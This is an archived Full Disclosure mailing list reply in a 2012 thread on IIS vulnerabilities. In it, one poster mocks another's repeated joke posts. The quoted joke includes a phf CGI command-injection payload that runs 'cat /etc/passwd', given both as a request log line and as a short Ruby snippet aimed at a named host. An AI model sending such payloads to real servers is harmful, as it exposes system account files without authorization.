Full Disclosure mailing list archives
Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
From: Gage Bystrom <themadichib0d () gmail com>
Date: Tue, 17 Jul 2012 10:09:13 -0700
Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny! ---------- I actually got nothing against you personally but its boring when you use the same tactic over and over :/ mix things up and make it interesting! On Jul 17, 2012 8:24 AM, "Григорий Братислава" <musntlive () gmail com> wrote:
On Tue, Jul 17, 2012 at 10:11 AM, king cope <isowarez.isowarez.isowarez () googlemail com> wrote:Hello Jan, I did some additional tests for the IIS bugs. * IIS 6.0 PHP authentication bypass is only possible on Windows Server 2003 SP1. SP2 seems unaffected So take that bug as resolved, my mistake as I didn't have a fully patched system online when testing.kingcope are we is release advisories to patched software? Is so, then I introduce exploit along with you. Hello full disclosure!! !! !! Is like to warn you about phf vulnerability. Is hackers can get your password list in is unpatched server. PoC on is my system: 213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 - In Ruby (here we is own rsnake): require 'open-uri' open(' http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0'){ |f| print f.read } _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin, (continued)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Thor (Hammer of God) (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Thor (Hammer of God) (Jul 16)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin king cope (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Gage Bystrom (Jul 17)
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)
- Message not available
- Message not available
- Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin Григорий Братислава (Jul 17)